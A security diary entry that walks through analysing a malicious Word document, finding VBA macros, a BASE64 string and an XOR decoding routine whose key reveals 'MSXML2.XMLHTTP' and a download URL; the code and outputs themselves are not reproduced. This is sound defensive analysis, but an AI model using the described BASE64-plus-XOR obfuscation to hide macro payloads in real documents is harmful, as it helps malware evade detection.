Maldoc: Once More It's XOR

Published: 2018-10-13
Last Updated: 2018-10-13 22:20:18 UTC
by Didier Stevens (Version: 1)
3 comment(s)

I was asked for help with malicious Word document MD5 7ea8e50ce884dab89a13803ccebea26e.

Like always, I first run on a sample:

As expected, it contains VBA macros. Then I quickly look at the source code of the VBA code in all macro streams (options -s a -v):

I noticed a string that looks like BASE64 at the end of the VBA source code (that's why I used a tail command in this screenshot). Checking with my tool confirms that this is indeed BASE64:

The output confirms that it is BASE64, although I don't recognize the binary data (most bytes are not printable characters).

The string is BASE64, and function gFpVdtRecxaZD is most likely a BASE64 decoder function. The return value of this function is used as first argument to function MOMCqdxBOimtoI. Function MOMCqdxBOimtoI takes 2 arguments, the second argument is a printable string.

I've seen this often before, MOMCqdxBOimtoI is most likely a decoding function, and the second string is the decoding key.

What encoding function? First I try XOR encoding, because it's popular. With my tool I check what the result is of XORing the decoded BASE64 string with the key:

I get a readable, known string: MSXML2.XMLHTTP. This confirms that the encoding is indeed XOR and that the second argument is the key.

Grepping for string MOMCqdxBOimtoI shows me all the lines with encoded strings:

I check the longest string first, because that's most likely the URL:

This analysis can also be automated with plugins.

My oledump plugin plugin_http_heuristics was not able to decode the URL of this sample, until I made a small change:

I'll explain the changes to this plugin in the next diary entry.


Didier Stevens
Senior handler
Microsoft MVP

Keywords: maldoc xor
3 comment(s)


Do current versions of Word disable support for .DOC by default yet? It would seem to be a good idea. But they also open it in a kind of sandbox, IIRC. So what versions of Word are vulnerable to this and are they in default configuration?
And it would seem that WebSense/Triton hasn't seen it either. It's "uncategorized" as of now as well.
No, .doc is fully supported.

Diary Archives